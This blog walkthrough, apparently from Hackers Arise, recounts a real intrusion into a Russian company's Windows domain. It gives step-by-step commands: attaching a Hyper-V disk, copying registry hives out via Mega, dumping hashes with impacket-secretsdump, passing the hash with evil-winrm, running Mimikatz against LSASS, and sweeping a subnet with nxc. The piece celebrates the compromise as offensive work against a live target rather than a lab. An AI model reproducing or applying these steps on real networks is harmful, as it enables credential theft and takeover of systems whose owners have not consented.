National Cyber Warfare Foundation (NCWF)

Welcome back, cyberwarriors. Cyber Cossacks here with a new walkthrough. In a recent engagement, we managed to take control of an entire domain starting from a separate machine that wasn’t joined to it. In modern enterprise networks, virtualization and segmented infrastructure are often used as safeguards. For some administrators it’s an architectural illusion of security […]

The post Taking Over a Russian Domain using Techniques from Digital Forensics first appeared on Hackers Arise.

Welcome back, cyberwarriors.

Cyber Cossacks here with a new walkthrough. In a recent engagement, we managed to take control of an entire domain starting from a separate machine that wasn’t joined to it. In modern enterprise networks, virtualization and segmented infrastructure are often used as safeguards. For some administrators it’s an architectural illusion of security meant to prevent a compromise in one part of the system from cascading into another. But when misconfigured, these same layers become the path an attacker needs. Our goal is to show you how a single isolated virtual machine intentionally placed outside the domain served as the pivot point for a full domain compromise inside a Russian company.

Initial Foothold

The Windows machine we gained access to was primarily used to host Bitrix virtual machines. Bitrix is a well-known Russian platform that helps businesses organize their communication and operations. Managing Bitrix requires technical know-how, which is why companies usually outsource the task to third-party providers. This introduces a supply chain risk if credentials are not handled carefully. These Linux machines tend to be restricted in functionality but still provide enough to maintain access and route traffic. In our case, we landed on a Fedora machine without Python installed, a minor inconvenience but not an obstacle. This Windows host served as our pivot point into the internal infrastructure.

In one of our classes, OTW showed us that digital forensics is not only useful to defenders. Offline disk images, system hives, and memory dumps often contain enough credential residue to stage a complete compromise. This engagement proves it with clarity and here is how we put it into action.

Hyper-V

Inside Hyper-V, several virtual machines were stored, some Linux-based and others broken or powered off Windows systems. Of particular interest was a Windows VM that prompted for domain credentials on boot, confirming its membership in the organization’s Active Directory domain. Rather than attempt a live attack on the running system, we chose a cleaner approach. We shut it down and mounted its virtual hard disk directly on the Hyper-V host.

The virtual disk was located on the E: drive. Using Disk Management, we selected “Action” followed by “Attach VHD,” which mounted the VHD and exposed its partitions.

Drives H: and I: appeared. The larger one, I: in our case, held the files we were after.

Hives

Our next goal was to pull the hives that store credential hashes. They contain the data structures Windows uses to store password hashes for local and domain accounts. The files we needed were SAM, SECURITY, and SYSTEM. You can find them in:

I:\Windows\System32\config\

We transferred them off the host using Mega, which gave us a clean bridge to our Kali system for offline analysis.

Attacking SAM

On Kali, we used the secretsdump.py utility from Impacket to process the hives:

kali > impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

This gave us Administrator’s NTLM and DCC2 hashes of different domain users. DCC2 hashes aren’t as usable as NTLM, so success depends on the quality of your wordlist. Thankfully, we have the Administrator’s NTLM hash and might try to dump LSASS.

Connect to the target using Evil-WinRM:

kali > evil-winrm -i -u Administrator -H

This attack is also known as Pass-the-Hash, when you are passing the NTLM hash instead of the real password. Luckily, no antivirus was running, so we uploaded Mimikatz:

*Evil-WinRM* PS C:\> upload /root/mimikatz.exe C:\\Windows\\Temp\\mimikatz.exe

Attacking LSASS

We used Mimikatz to dump LSASS memory:

C:\Windows\Temp> .\mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit”

That worked. We pulled NTLM hashes for domain users. With a bit of digging, we found the hash of a domain admin.

NXC

To verify the hash was still valid and useful, we ran NXC to check access to other machines in the domain:

kali > nxc smb 192.168.0.1/24 -u admin -H

The scan shows multiple systems that accepted the credentials. Lateral movement from this point would be trivial. We had achieved full control over the domain starting from a machine that was never meant to be connected to it in the first place.

Conclusion

Digital forensics isn’t just a defensive tool. When used creatively, it can help attackers pull credentials from offline systems and move through a network. This time, one seemingly isolated Windows machine gave us everything we needed. By mounting a dormant virtual disk and extracting registry hives, we got the credentials without any exploit. The result was domain-wide administrative control. We showed that in complex networks, poor segmentation can be exploited just as effectively as live vulnerabilities.